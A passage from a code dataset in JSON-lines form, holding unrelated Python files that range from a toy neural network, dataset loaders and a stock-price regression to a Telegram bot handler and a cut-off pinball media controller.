E = Z-c\n        deltaSigs[0][0][c] -= 1\n        #Now adjust weights and biases using the delta signal\n        for i in range(len(weights)):\n            deltaSig = deltaSigs[-1].dot(weights[-i-1].T)\n            deltaSig1 = deltaSig*sigmoid_prime(activations[-i-2])\n            deltaSigs.append(deltaSig1) #creating delta signals\n        for i in range(len(weights)):\n            weights[i] -= learnrate * activations[i].T.dot(deltaSigs[-i-2]) #we don't want to include the output activation, and we use the last set of delta signals\n            #when deltaSig (which is like the error for a certain node) is large, the weight goes down so it factors in less\n            biases[i] -= deltaSigs[-i-2] * learnrate #same as the weights, with an implicit activation of 1\n    \n\ndef sigmoid(x): #output is always between 0 and 1\n    '''The activation function.'''\n    return 1/(1+np.exp(-x))\n\ndef sigmoid_prime(y): #takes the stored activation output, so nothing is recomputed\n    '''Derivative of the activation function. 
Used in backpropagation.'''\n return y*(1-y)\n\n#generate inputs\n\n\nfor i in range(epochs):\n x = np.random.uniform(low = 0, high = 1.0, size = 2) \n c = 1 if x[0]**2 + x[1]**2 < 1 else 0\n train(x,c)\n\nnum = 1000\ncorrect = 0\nfor i in range(num):\n x = np.random.uniform(low = 0, high = 1.0, size = 2) \n c = 1 if x[0]**2 + x[1]**2 < 1 else 0\n activations = [array([x])]\n for weight,bias in zip(weights,biases): #because same length and zip is cool! \n activations.append(sigmoid(np.dot(activations[-1],weight)+bias)) #this line does all the work\n result = np.argmax(activations[-1])\n #print(activations) \n if result == c:\n correct += 1\n\nprint (correct)\nprint (weights)\nprint (biases)\n","sub_path":"Circle-Kevin minus comments.py","file_name":"Circle-Kevin minus comments.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"529831152","text":"from setuptools import setup, find_packages\n# import os\n\nversion = '1.0.b2'\n\nsetup(name='readset.i18n',\n version=version,\n description=\"This package provides a Normalizer for Chinese character\",\n long_description=open(\"README.rst\").read() + \"\\n\" +\n open(\"CHANGES.rst\").read(),\n # Get more strings from\n # http://pypi.python.org/pypi?:action=list_classifiers\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Web Environment\",\n \"Framework :: Plone\",\n \"Framework :: Zope2\",\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Natural Language :: Chinese (Simplified)\",\n \"Natural Language :: Chinese (Traditional)\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Topic :: Text Processing\",\n ],\n keywords='Zope Plone i18n i10n Pinyin',\n author='Jian Aijun',\n author_email='jianaijun@gmail.com',\n url='http://pypi.python.org/pypi/readset.i18n',\n license='GPL version 2',\n package_dir={'': 'src'},\n packages=find_packages('src'),\n namespace_packages=['readset'],\n include_package_data=True,\n zip_safe=False,\n test_suite=\"readset.i18n\",\n install_requires=[\n 'setuptools',\n 'zope.interface',\n 'zope.component',\n 'zope.publisher',\n 'plone.i18n',\n ],\n extras_require={\n 'test': [\n 'zope.component [zcml]',\n 'zope.configuration',\n 'zope.browserresource',\n 'plone.testing',\n 'zope.testing',\n ]\n },\n entry_points=\"\"\"\n # -*- Entry points: -*-\n\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"421917129","text":"from datetime import datetime\n\nfrom django.contrib.auth.models import User\nfrom django.core.management.base import BaseCommand\nfrom django.db.models import Count\n\nfrom app.models import Email\n\n\nclass Command(BaseCommand):\n help = 'Deletes DR3 emails'\n\n def handle(self, *args, **options):\n emails = Email.objects\\\n .annotate(recipient__goal_count=Count('recipient__goal'))\\\n .filter(name='dr3')\\\n .filter(recipient__date_joined__gte=datetime(2016, 12, 28))\\\n .filter(recipient__date_joined__lte=datetime(2017, 1, 15))\\\n .filter(recipient__goal_count=0)\n\n print(emails.count())\n\n for email in emails:\n 
email.recipient.delete()\n","sub_path":"app/management/commands/deletedr3users.py","file_name":"deletedr3users.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"261399625","text":"from __future__ import print_function, division\nimport os\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils\nfrom scipy.io import loadmat\nimport logging\nimport copy\nfrom tqdm import tqdm\nfrom PIL import Image\nimport numpy as np\nimport fnmatch\nimport csv\n\ndata_path_from_home = '/Data/tokyoTimeMachine'\ndata_path = os.environ['HOME'] + data_path_from_home\n\nimage_transform = transforms.Compose([\n    transforms.Resize((224, 224)),\n    transforms.ToTensor(),\n    ]\n)\n\nclass TokyoDataSet(Dataset):\n\n    def __init__(self, type='train', mode='db', root_dir = data_path, transforms=image_transform):\n\n        self.logger = self.generate_logger(type)\n        self.type = type\n        self.logger.info('Loading Tokyo ' + ('Train' if type == 'train' else 'Val') + ' Matrix')\n        mat_file = '/tokyoTM_train.mat' if type == 'train' else '/tokyoTM_val.mat'\n        mat = loadmat(os.path.join(root_dir + mat_file))['dbStruct'][0][0]\n        self.root_dir = root_dir\n        self.image_dir = self.root_dir + '/images'\n        adder = 0 if mode == 'db' else 3  # 'db' selects database images, 'query' selects query images\n        self.length = len(mat[adder + 1])\n        self.data = [{} for _ in range(self.length)]\n        self.transforms = transforms\n        self.utm = [[mat[adder+2][0][i], mat[adder+2][1][i]] for i in range(self.length)]\n\n\n        for idx in tqdm(range(self.length)):\n            self.data[idx]['filename'] = mat[adder + 1][idx][0][0]\n            self.data[idx]['utm_coordinate'] = (mat[adder + 2][0][idx], mat[adder + 2][1][idx])\n            self.data[idx]['timestamp'] = mat[adder + 3][0][idx]\n            self.data[idx]['image'] = os.path.join(self.image_dir, self.data[idx]['filename'])\n            self.data[idx]['original_image'] = os.path.join(self.image_dir, self.data[idx]['filename'])\n\n            if mode == 'query':\n                self.data[idx]['pos'] = [-1] * 10\n                self.data[idx]['neg'] = [-1] * 10\n\n        self.logger.info('Done')\n\n    def __len__(self):\n        return self.length\n\n    def __getitem__(self, idx):\n\n        ret = copy.deepcopy(self.data[idx])\n        ret['image'] = self.transforms(Image.open(self.data[idx]['image']))\n        ret['original_image'] = Image.open(self.data[idx]['original_image'])\n        return ret\n\n    def generate_logger(self, type):\n        logger_name = 'trainData' if type == 'train' else 'valData'\n        logger = logging.getLogger(logger_name)\n        logger.setLevel(logging.INFO)\n        ch = logging.StreamHandler()\n        ch.setLevel(logging.INFO)\n        formatter = logging.Formatter('%(levelname)s: %(message)s')\n        ch.setFormatter(formatter)\n        logger.addHandler(ch)\n        return logger\n\n    def set(self, idx, key, val):\n        self.data[idx][key] = val\n\n\nclass TokyoTrainDataSet(TokyoDataSet):\n\n    def __init__(self, mode='db', GT_from_file=False):\n        super().__init__(type='train', mode=mode)\n\n\nclass TokyoValDataSet(TokyoDataSet):\n\n    def __init__(self, mode='db', GT_from_file=False):\n        super().__init__(type='val', mode=mode)\n\n\nclass Tokyo247(Dataset):\n\n    def __init__(self, root_dir=data_path, transform=image_transform):\n        self.logger = self.generate_logger()  # build the logger\n        self.root_dir = root_dir\n        self.image_dir = root_dir + '/247query_v3'\n        self.matname = np.sort(fnmatch.filter(os.listdir(self.image_dir), '*.csv'))\n        self.imname = np.sort(fnmatch.filter(os.listdir(self.image_dir), '*.jpg'))\n        self.length = len(self.imname)\n        self.data = np.array([{} for _ in range(self.length)])\n        self.transforms = transform  # honor the transform argument\n\n        for 
idx in tqdm(range(self.length)):\n f = open(self.image_dir + '/' + self.matname[idx])\n mat = csv.reader(f, delimiter=',')\n mat = list(mat)[0]\n f.close()\n\n self.data[idx]['filename'] = mat[0]\n self.data[idx]['utm_coordinate'] = (mat[7], mat[8])\n self.data[idx]['image'] = os.path.join(self.image_dir, self.data[idx]['filename'])\n\n\n def __len__(self):\n return self.length\n\n def __getitem__(self, idx):\n\n ret = copy.deepcopy(self.data[idx])\n ret['image'] = self.transforms(Image.open(self.data[idx]['image']))\n return ret\n\n\n def generate_logger(self):\n logger_name = 'testData'\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.INFO)\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n formatter = logging.Formatter('%(levelname)s: %(message)s')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n return logger\n\n","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"40151393","text":"import Funzioni\r\nfrom Funzioni import *\r\nfrom Dati import *\r\n\r\n\r\n\r\nPulizia_File(\"Dati_Punti_Possibili.txt\")\r\n\r\nfinput = open(\"Dati_Punti.txt\", \"r\")\r\nfoutput = open(\"Dati_Punti_Possibili.txt\", \"w\")\r\n\r\ntry:\r\n for line in finput.read().split(\"\\n\"):\r\n Dati = list()\r\n triangoli = line.split(\"|;\")\r\n triangoli.pop()\r\n for triangolo in triangoli:\r\n lt = list()\r\n punti = triangolo.split(\"|\")\r\n for punto in punti:\r\n x,y = punto.split(\",\")\r\n lt.append([int(x),int(y)])\r\n Dati.append(lt)\r\n\r\n if Collisione_Braccio_Triangolo(Dati, Ostacolo1) or Collisione_Braccio_Triangolo(Dati, Ostacolo2):\r\n continue\r\n else:\r\n foutput.write(str(Dati)+\"\\n\")\r\nexcept Exception as e:\r\n pass\r\n \r\n \r\n \r\n\r\n \r\nfinput.close()\r\nfoutput.close()\r\n\r\n\r\n","sub_path":"libs/Calcoli_Punti_Possibili.py","file_name":"Calcoli_Punti_Possibili.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"646032200","text":"\r\nimport os\r\n\r\ndef fiboNum (Fn):\r\n\r\n if Fn == 0:\r\n return 0\r\n\r\n elif Fn == 1:\r\n return 1\r\n else:\r\n result = fiboNum(Fn-1) + fiboNum(Fn-2)\r\n return result\r\n\r\n# Ask how many numbers they want\r\nnumFibValues = int(input(\"How many Fibonacci values should be found? 
\"))\r\n\r\n\r\n\r\n# Loop while calling for each new number\r\n\r\ni = 1\r\nwhile i < numFibValues:\r\n fibValue = fiboNum(i)\r\n print(fibValue)\r\n\r\n i += 1\r\n\r\nprint(\"Task Completed\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"ReadingAndWritingFiles/FibonacciWithUser/FibonacciValuesWithUserInput.py","file_name":"FibonacciValuesWithUserInput.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3362813","text":"\nimport pandas_datareader.data as web\nimport statsmodels.api as sm\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\n\nend='2016/9/30'\nn225 = web.DataReader(\"NIKKEI225\", 'fred',\"1949/5/16\",end).dropna()\nlnn225=np.log(n225.dropna())\nlnn225.columns=['Close']\ny=lnn225\nx=range(len(lnn225))\nx=sm.add_constant(x)\nmodel=sm.OLS(y,x)\nresults=model.fit()\n\nprint(results.summary())\n\n\n\n\n\n\ny=lnn225.loc['1986/12/1':'1993/10/31'].dropna()\nx=range(len(y))\nx=sm.add_constant(x)\nmodel=sm.OLS(y,x)\nresults=model.fit()\nprint(results.summary())\n\n\n\n\ny=lnn225.loc['1986/12/1':'1989/12/31'].dropna()\nx=range(len(y))\nx=sm.add_constant(x)\nmodel=sm.OLS(y,x)\nresults=model.fit()\nprint(results.summary())\n\n\nprint(\"return \",np.exp(y.Close).pct_change().mean()*250)\nprint(\"volatility \",y.Close.diff().std()*np.sqrt(250))\nprint(\"std of residual\",results.resid.std())\nplt.plot(y,label='Close',color='darkgray')\n\n\nresults.resid.hist(bins=10,color=\"lightyellow\")\nplt.xlabel('residual')\nplt.ylabel('frequency')\n\n\n\nplt.show()\n\n","sub_path":"6.4.15.py","file_name":"6.4.15.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382878631","text":"\"\"\"\nTemplate testing suite for 2048\n\"\"\"\n\nimport poc_simpletest\n\n# Directions, DO NOT MODIFY\nUP = 1\nDOWN = 2\nLEFT = 3\nRIGHT = 4\n\ndef run_suite(game_class):\n \"\"\"\n Some informal testing code\n \"\"\"\n \n # create a TestSuite object\n suite = poc_simpletest.TestSuite() \n \n # create a game\n game = game_class(2,2)\n \n # add tests using suite.run_test(....) 
plt.plot(y,label='Close',color='darkgray')\n\n\nresults.resid.hist(bins=10,color=\"lightyellow\")\nplt.xlabel('residual')\nplt.ylabel('frequency')\n\n\n\nplt.show()\n\n","sub_path":"6.4.15.py","file_name":"6.4.15.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382878631","text":"\"\"\"\nTemplate testing suite for 2048\n\"\"\"\n\nimport poc_simpletest\n\n# Directions, DO NOT MODIFY\nUP = 1\nDOWN = 2\nLEFT = 3\nRIGHT = 4\n\ndef run_suite(game_class):\n    \"\"\"\n    Some informal testing code\n    \"\"\"\n    \n    # create a TestSuite object\n    suite = poc_simpletest.TestSuite() \n    \n    # create a 4 x 5 game (height 4, width 5) to match the grid tests below\n    game = game_class(4, 5)\n    \n    # add tests using suite.run_test(....) here\n\n    # test the initial configuration of the board using the str method\n    suite.run_test(str(game), str([]), \"Test #0: init\")\n    \n    # suite.run_test(game.reset(), str([]), \"Test #1: reset\")\n    game.reset()\n    suite.run_test(str(game), str([[0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0]]), \"Test #1: reset\")\n\n    suite.run_test(game.get_grid_height(), 4, \"Test #2: get_grid_height\")\n    suite.run_test(game.get_grid_width(), 5, \"Test #3: get_grid_width\")\n    \n    game.set_tile(0, 0, 5)\n    game.set_tile(0, 1, 5)\n    game.set_tile(1, 0, 5)\n    game.set_tile(1, 1, 5)\n    game.set_tile(2, 0, 5)\n    game.set_tile(0, 2, 5)\n    game.set_tile(2, 2, 5)\n    game.set_tile(-1, 2, 5)\n    #game.set_tile(, , 5)\n    #game.move(UP)\n    #game.move(DOWN)\n    #game.move(LEFT)\n    #game.move(RIGHT)\n    \n    # report number of tests and failures\n    suite.report_results()\n","sub_path":"Coursera/2015_PrincipleOfComputing_Rice/Wk2_Proj2_Final14_Test_user40_bJHRdpmDGW_19.py","file_name":"Wk2_Proj2_Final14_Test_user40_bJHRdpmDGW_19.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"568820366","text":"import logging\nfrom typing import Union\n\nfrom aiogram.dispatcher.dispatcher import Dispatcher\nimport aiogram.utils.markdown as fmt\nfrom aiogram import types\n\nfrom tgbot.database import connect\nfrom .keyboards import main_keyboard_kb\nfrom main_menu.dbworker import add_user\n\nlogger = logging.getLogger(__name__)\n\n\ndef main_munu_register(dp: Dispatcher):\n    dp.register_message_handler(start_cmd, commands=['start'])\n\n\nasync def start_cmd(message: Union[types.CallbackQuery, types.Message], **kwargs):\n    if isinstance(message, types.Message): \n        chat_id = message.chat.id\n    elif isinstance(message, types.CallbackQuery): \n        chat_id = message.message.chat.id\n        message = message.message\n    \n    connection = await connect()\n    await add_user(connection, chat_id)\n    markup = await main_keyboard_kb(connection)\n\n    await message.reply(\n        reply=False,\n        reply_markup=markup,\n        disable_notification=True,\n        text=fmt.hbold('Main menu categories')\n    )\n    connection.close()\n","sub_path":"main_menu/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"243136706","text":"\"\"\"Pygame-based media controller for MPF (BCP) v1.0\"\"\"\n# media_controller.py\n# Mission Pinball Framework\n# Written by Brian Madden & Gabe Knuth\n# Released under the MIT License. 
(See license info at the end of this file.)\n\n# Documentation and more info at http://missionpinball.com/mpf\n\nimport logging\nimport os\nimport sys\nimport time\nfrom distutils.version import LooseVersion\nimport Queue\n\n\nimport pygame\n\nfrom mpf.media_controller.core import *\nfrom mpf.media_controller.core.bcp_server import BCPServer\nfrom mpf.system.config import Config, CaseInsensitiveDict\nfrom mpf.system.events import EventManager\nfrom mpf.system.timing import Timing\nfrom mpf.system.tasks import Task, DelayManager\nfrom mpf.system.player import Player\nimport mpf.system.bcp as bcp\nimport version\n\n\nclass MediaController(object):\n\n def __init__(self, options):\n self.options = options\n\n self.log = logging.getLogger(\"MediaController\")\n self.log.info(\"Media Controller Version %s\", version.__version__)\n self.log.debug(\"Backbox Control Protocol Version %s\",\n version.__bcp_version__)\n self.log.debug(\"Config File Version %s\",\n version.__config_version__)\n\n python_version = sys.version_info\n self.log.debug(\"Python version: %s.%s.%s\", python_version[0],\n python_version[1], python_version[2])\n self.log.debug(\"Platform: %s\", sys.platform)\n self.log.debug(\"Python executable location: %s\", sys.executable)\n self.log.debug(\"32-bit Python? %s\", sys.maxsize < 2**32)\n\n self.active_debugger = dict()\n\n self.config = dict()\n self.done = False # todo\n self.machine_path = None\n self.asset_managers = dict()\n self.num_assets_to_load = 0\n self.window = None\n self.window_manager = None\n self.pygame = False\n self.pygame_requested = False\n self.registered_pygame_handlers = dict()\n self.pygame_allowed_events = list()\n self.socket_thread = None\n self.receive_queue = Queue.Queue()\n self.sending_queue = Queue.Queue()\n self.crash_queue = Queue.Queue()\n self.modes = CaseInsensitiveDict()\n self.player_list = list()\n self.player = None\n self.HZ = 0\n self.next_tick_time = 0\n self.secs_per_tick = 0\n\n Task.create(self._check_crash_queue)\n\n self.bcp_commands = {'ball_start': self.bcp_ball_start,\n 'ball_end': self.bcp_ball_end,\n 'config': self.bcp_config,\n 'error': self.bcp_error,\n 'get': self.bcp_get,\n 'goodbye': self.bcp_goodbye,\n 'hello': self.bcp_hello,\n 'mode_start': self.bcp_mode_start,\n 'mode_stop': self.bcp_mode_stop,\n 'player_added': self.bcp_player_add,\n 'player_score': self.bcp_player_score,\n 'player_turn_start': self.bcp_player_turn_start,\n 'player_variable': self.bcp_player_variable,\n 'reset': self.reset,\n 'set': self.bcp_set,\n 'shot': self.bcp_shot,\n 'switch': self.bcp_switch,\n 'timer': self.bcp_timer,\n 'trigger': self.bcp_trigger,\n }\n\n # load the MPF config & machine defaults\n self.config = (\n Config.load_config_yaml(config=self.config,\n yaml_file=self.options['mcconfigfile']))\n\n # Find the machine_files location. If it starts with a forward or\n # backward slash, then we assume it's from the mpf root. Otherwise we\n # assume it's from the subfolder location specified in the\n # mpfconfigfile location\n\n if (options['machinepath'].startswith('/') or\n options['machinepath'].startswith('\\\\')):\n machine_path = options['machinepath']\n else:\n machine_path = os.path.join(self.config['media_controller']['paths']\n ['machine_files'],\n options['machinepath'])\n\n self.machine_path = os.path.abspath(machine_path)\n\n # Add the machine folder to our path so we can import modules from it\n sys.path.append(self.machine_path)\n\n self.log.info(\"Machine folder: %s\", machine_path)\n\n # Now find the config file location. 
Same as machine_file, with the\n        # slash used to specify an absolute path\n\n        if (options['configfile'].startswith('/') or\n                options['configfile'].startswith('\\\\')):\n            config_file = options['configfile']\n        else:\n\n            if not options['configfile'].endswith('.yaml'):\n                options['configfile'] += '.yaml'\n\n            config_file = os.path.join(self.machine_path,\n                                       self.config['media_controller']['paths']\n                                       ['config'],\n                                       options['configfile'])\n\n        self.log.debug(\"Base machine config file: %s\", config_file)\n\n        # Load the machine-specific config\n        self.config = Config.load_config_yaml(config=self.config,\n                                              yaml_file=config_file)\n\n        mediacontroller_config_spec = '''\n                        exit_on_disconnect: boolean|True\n                        port: int|5050\n                        '''\n\n        self.config['media_controller'] = (\n            Config.process_config(mediacontroller_config_spec,\n                                  self.config['media_controller']))\n\n        self.events = EventManager(self, setup_event_player=False)\n        self.timing = Timing(self)\n\n        # Load the media controller modules\n        self.config['media_controller']['modules'] = (\n            self.config['media_controller']['modules'].split(' '))\n        self.log.info(\"Loading Modules...\")\n        for module in self.config['media_controller']['modules']:\n            self.log.debug(\"Loading module: %s\", module)\n            module_parts = module.split('.')\n            exec('self.' + module_parts[0] + '=' + module + '(self)')\n\n            # todo there's probably a more pythonic way to do this, and I know\n            # exec() is supposedly unsafe, but meh, if you have access to put\n            # malicious files in the system folder then you have access to this\n            # code too.\n\n        self.start_socket_thread()\n\n        self.events.post(\"init_phase_1\")\n        self.events.post(\"init_phase_2\")\n        self.events.post(\"init_phase_3\")\n        self.events.post(\"init_phase_4\")\n        self.events.post(\"init_phase_5\")\n\n        self.reset()\n\n    def _check_crash_queue(self):\n        try:\n            crash = self.crash_queue.get(block=False)\n        except Queue.Empty:\n            yield 1000\n        else:\n            self.log.critical(\"MPF Shutting down due to child thread crash\")\n            self.log.critical(\"Crash details: %s\", crash)\n            self.done = True\n\n    def reset(self, **kwargs):\n        \"\"\"Processes an incoming BCP 'reset' command.\"\"\"\n        self.player = None\n        self.player_list = list()\n\n        self.events.post('mc_reset_phase_1')\n        self.events.post('mc_reset_phase_2')\n        self.events.post('mc_reset_phase_3')\n\n    def get_window(self):\n        \"\"\" Returns a reference to the onscreen display window.\n\n        This method will set up a window if one doesn't exist yet. This method\n        exists because there are several different modules and plugins which\n        may want to use a window, but we don't know which combinations might\n        be used, so we centralize the creation and management of an onscreen\n        window here.\n        \"\"\"\n\n        if not self.window:\n            self.window_manager = window.WindowManager(self)\n            self.window = self.window_manager.window\n\n        return self.window\n\n    def request_pygame(self):\n        \"\"\"Called by a module to let the system know it would like to use\n        Pygame. We centralize the requests instead of letting each module do\n        their own pygame.init() so we get it in one place and can get everything\n        initialized in the right order.\n\n        Returns: True or False, depending on whether pygame is available or not.\n        \"\"\"\n\n        if pygame and not self.pygame_requested:\n            self.events.add_handler('init_phase_3', self._pygame_init)\n            self.pygame_requested = True\n            return True\n\n        else:\n            return False\n\n    def _pygame_init(self):\n        # performs the actual pygame initialization\n\n        if not pygame:\n            self.log.critical(\"Pygame is needed but not available. 
Please \"\n \"install Pygame and try again.\")\n raise Exception(\"Pygame is needed but not available. Please install\"\n \" Pygame and try again.\")\n\n if not self.pygame:\n self.log.debug(\"Initializing Pygame, version %s\",\n pygame.version.ver)\n\n pygame.init()\n self.pygame = True\n\n self.events.add_handler('timer_tick', self.get_pygame_events,\n priority=1000)\n\n self.events.post('pygame_initialized')\n\n def register_pygame_handler(self, event, handler):\n \"\"\"Registers a method to be a handler for a certain type of Pygame\n event.\n\n Args:\n event: A string of the Pygame event name you're registering this\n handler for.\n handler: A method that will be called when this Pygame event is\n posted.\n \"\"\"\n if event not in self.registered_pygame_handlers:\n self.registered_pygame_handlers[event] = set()\n\n self.registered_pygame_handlers[event].add(handler)\n self.pygame_allowed_events.append(event)\n\n self.log.debug(\"Adding Window event handler. Event:%s, Handler:%s\",\n event, handler)\n\n pygame.event.set_allowed(self.pygame_allowed_events)\n\n def get_pygame_events(self):\n \"\"\"Gets (and dispatches) Pygame events. Automatically called every\n machine loop via the timer_tick event.\n \"\"\"\n for event in pygame.event.get():\n if event.type in self.registered_pygame_handlers:\n for handler in self.registered_pygame_handlers[event.type]:\n\n if (event.type == pygame.KEYDOWN or\n event.type == pygame.KEYUP):\n handler(event.key, event.mod)\n else:\n handler()\n\n def _process_command(self, bcp_command, **kwargs):\n self.log.debug(\"Processing command: %s %s\", bcp_command, kwargs)\n\n\n # Can't use try/except KeyError here becasue there could be a KeyError\n # in the callback which we don't want it to swallow.\n if bcp_command in self.bcp_commands:\n self.bcp_commands[bcp_command](**kwargs)\n else:\n self.log.warning(\"Received invalid BCP command: %s\", bcp_command)\n self.send('error', message='invalid command', command=bcp_command)\n\n\n def send(self, bcp_command, callback=None, **kwargs):\n \"\"\"Sends a BCP command to the connected pinball controller.\n\n Args:\n bcp_command: String of the BCP command name.\n callback: Optional callback method that will be called when the\n command is sent.\n **kwargs: Optional additional kwargs will be added to the BCP\n command string.\n\n \"\"\"\n self.sending_queue.put(bcp.encode_command_string(bcp_command,\n **kwargs))\n if callback:\n callback()\n\n def send_dmd_frame(self, data):\n \"\"\"Sends a DMD frame to the BCP client.\n\n Args:\n data: A 4096-length raw byte string.\n \"\"\"\n\n dmd_string = 'dmd_frame?' 
+ data\n self.sending_queue.put(dmd_string)\n\n def _timer_init(self):\n self.HZ = 30\n self.next_tick_time = time.time()\n self.secs_per_tick = 1.0 / self.HZ\n\n def timer_tick(self):\n \"\"\"Called by the platform each machine tick based on self.HZ\"\"\"\n self.timing.timer_tick() # notifies the timing module\n self.events.post('timer_tick') # sends the timer_tick system event\n Task.timer_tick() # notifies tasks\n DelayManager.timer_tick()\n\n def run(self):\n \"\"\"Main run loop.\"\"\"\n self._timer_init()\n\n self.log.info(\"Starting the run loop at %sHz\", self.HZ)\n\n start_time = time.time()\n loops = 0\n\n secs_per_tick = self.secs_per_tick\n\n self.next_tick_time = time.time()\n\n try:\n while self.done is False:\n time.sleep(0.001)\n\n self.get_from_queue()\n\n if self.next_tick_time <= time.time(): # todo change this\n self.timer_tick()\n self.next_tick_time += secs_per_tick\n loops += 1\n\n self._do_shutdown()\n self.log.info(\"Target loop rate: %s Hz\", self.HZ)\n self.log.info(\"Actual loop rate: %s Hz\",\n loops / (time.time() - start_time))\n\n except KeyboardInterrupt:\n self.shutdown()\n\n def shutdown(self):\n \"\"\"Shuts down and exits the media controller.\n\n This method will also send the BCP 'goodbye' command to any connected\n clients.\n \"\"\"\n self.socket_thread.stop()\n\n def _do_shutdown(self):\n if self.pygame:\n pygame.quit()\n\n def socket_thread_stopped(self):\n \"\"\"Notifies the media controller that the socket thread has stopped.\"\"\"\n self.done = True\n\n def start_socket_thread(self):\n \"\"\"Starts the BCPServer socket thread.\"\"\"\n self.socket_thread = BCPServer(self, self.receive_queue,\n self.sending_queue)\n self.socket_thread.daemon = True\n self.socket_thread.start()\n\n def get_from_queue(self):\n \"\"\"Gets and processes all queued up incoming BCP commands.\"\"\"\n while not self.receive_queue.empty():\n cmd, kwargs = bcp.decode_command_string(\n self.receive_queue.get(False))\n self._process_command(cmd, **kwargs)\n\n def bcp_hello(self, **kwargs):\n \"\"\"Processes an incoming BCP 'hello' command.\"\"\"\n try:\n if LooseVersion(kwargs['version']) == (\n LooseVersion(version.__bcp_version__)):\n self.send('hello', version=version.__bcp_version__)\n else:\n self.send('hello', version='unknown protocol version')\n except:\n self.log.warning(\"Received invalid 'version' parameter with \"\n \"'hello'\")\n\n def bcp_goodbye(self, **kwargs):\n \"\"\"Processes an incoming BCP 'goodbye' command.\"\"\"\n if self.config['media_controller']['exit_on_disconnect']:\n self.socket_thread.sending_thread.stop()\n sys.exit()\n\n def bcp_mode_start(self, name=None, priority=0, **kwargs):\n \"\"\"Processes an incoming BCP 'mode_start' command.\"\"\"\n if not name:\n return\n #todo raise error\n\n if name == 'game':\n self._game_start()\n\n if name in self.modes:\n self.modes[name].start(priority=priority)\n\n def bcp_mode_stop(self, name, **kwargs):\n \"\"\"Processes an incoming BCP 'mode_stop' command.\"\"\"\n if not name:\n return\n #todo raise error\n\n if name == 'game':\n self._game_end()\n\n if name in self.modes:\n self.modes[name].stop()\n\n def bcp_error(self, **kwargs):\n \"\"\"Processes an incoming BCP 'error' command.\"\"\"\n self.log.warning('Received error command from client')\n\n def bcp_ball_start(self, **kwargs):\n \"\"\"Processes an incoming BCP 'ball_start' command.\"\"\"\n kwargs['player'] = kwargs.pop('player_num')\n\n self.events.post('ball_started', **kwargs)\n\n def bcp_ball_end(self, **kwargs):\n \"\"\"Processes an incoming BCP 
'ball_end' command.\"\"\"\n self.events.post('ball_ended', **kwargs)\n\n def _game_start(self, **kargs):\n \"\"\"Processes an incoming BCP 'game_start' command.\"\"\"\n self.player = None\n self.player_list = list()\n self.num_players = 0\n self.events.post('game_started', **kargs)\n\n def _game_end(self, **kwargs):\n \"\"\"Processes an incoming BCP 'game_end' command.\"\"\"\n self.player = None\n self.events.post('game_ended', **kwargs)\n\n def bcp_player_add(self, player_num, **kwargs):\n \"\"\"Processes an incoming BCP 'player_add' command.\"\"\"\n\n if player_num > len(self.player_list):\n new_player = Player(self, self.player_list)\n\n self.events.post('player_add_success', num=player_num)\n\n def bcp_player_variable(self, name, value, prev_value, change, player_num,\n **kwargs):\n \"\"\"Processes an incoming BCP 'player_variable' command.\"\"\"\n\n try:\n self.player_list[int(player_num)-1][name] = value\n except (IndexError, KeyError):\n pass\n\n def bcp_player_score(self, value, prev_value, change, player_num,\n **kwargs):\n \"\"\"Processes an incoming BCP 'player_score' command.\"\"\"\n\n try:\n self.player_list[int(player_num)-1]['score'] = int(value)\n except (IndexError, KeyError):\n pass\n\n def bcp_player_turn_start(self, player_num, **kwargs):\n \"\"\"Processes an incoming BCP 'player_turn_start' command.\"\"\"\n\n self.log.debug(\"bcp_player_turn_start\")\n\n if ((self.player and self.player.number != player_num) or\n not self.player):\n\n try:\n self.player = self.player_list[int(player_num)-1]\n except IndexError:\n self.log.error('Received player turn start for player %s, but '\n 'only %s player(s) exist',\n player_num, len(self.player_list))\n\n def bcp_trigger(self, name, **kwargs):\n \"\"\"Processes an incoming BCP 'trigger' command.\"\"\"\n self.events.post(name, **kwargs)\n\n def bcp_switch(self, name, state, **kwargs):\n \"\"\"Processes an incoming BCP 'switch' command.\"\"\"\n if int(state):\n self.events.post('switch_' + name + '_active')\n else:\n self.events.post('switch_' + name + '_inactive')\n\n def bcp_get(self, **kwargs):\n \"\"\"Processes an incoming BCP 'get' command.\n\n Note that this media controller doesn't 